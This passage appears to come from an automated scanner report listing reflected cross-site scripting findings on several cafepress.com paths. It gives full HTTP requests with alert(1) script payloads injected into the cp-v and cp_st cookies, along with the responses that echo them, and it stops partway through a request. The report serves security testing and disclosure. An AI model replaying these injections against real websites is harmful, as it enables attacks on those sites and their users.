<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = 'f1a93</script><script>alert(1)</script>a21dc3c1ba6'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.50. http://www.cafepress.com/+mousepads [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+mousepads

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2de4"-alert(1)-"8af102be85f was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+mousepads HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAe2de4"-alert(1)-"8af102be85f; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW19
Cteonnt-Length: 56880
Date: Sun, 26 Dec 2010 13:48:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:57 GMT; path=/
Set-Cookie: cp_sc=200051; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:57 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 56880

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAe2de4"-alert(1)-"8af102be85f";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.51. http://www.cafepress.com/+mousepads [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+mousepads

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6760</script><script>alert(1)</script>1c00c257e15 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+mousepads HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=a6760</script><script>alert(1)</script>1c00c257e15; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW22
Cteonnt-Length: 56907
Date: Sun, 26 Dec 2010 13:48:54 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:54 GMT; path=/
Set-Cookie: cp_sc=200051; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:54 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 56907

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = 'a6760</script><script>alert(1)</script>1c00c257e15'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.52. http://www.cafepress.com/+mugs [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+mugs

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49177"-alert(1)-"acf862ea6e2 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+mugs HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA49177"-alert(1)-"acf862ea6e2; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW18
Cteonnt-Length: 60103
Date: Sun, 26 Dec 2010 13:47:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:33 GMT; path=/
Set-Cookie: cp_sc=100139; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:33 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 60103

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA49177"-alert(1)-"acf862ea6e2";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.53. http://www.cafepress.com/+mugs [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+mugs

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6774f</script><script>alert(1)</script>147c0c0a55c was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+mugs HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=6774f</script><script>alert(1)</script>147c0c0a55c; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW16
Cteonnt-Length: 60125
Date: Sun, 26 Dec 2010 13:47:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:31 GMT; path=/
Set-Cookie: cp_sc=100139; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:31 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 60125

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = '6774f</script><script>alert(1)</script>147c0c0a55c'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.54. http://www.cafepress.com/+ornaments [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+ornaments

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40a17"-alert(1)-"1b71678a13 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+ornaments HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA40a17"-alert(1)-"1b71678a13; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 59006
Date: Sun, 26 Dec 2010 13:49:03 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:03 GMT; path=/
Set-Cookie: cp_sc=100180; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:03 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59006

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA40a17"-alert(1)-"1b71678a13";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.55. http://www.cafepress.com/+ornaments [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+ornaments

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 65868</script><script>alert(1)</script>67d717b073a was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+ornaments HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=65868</script><script>alert(1)</script>67d717b073a; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; 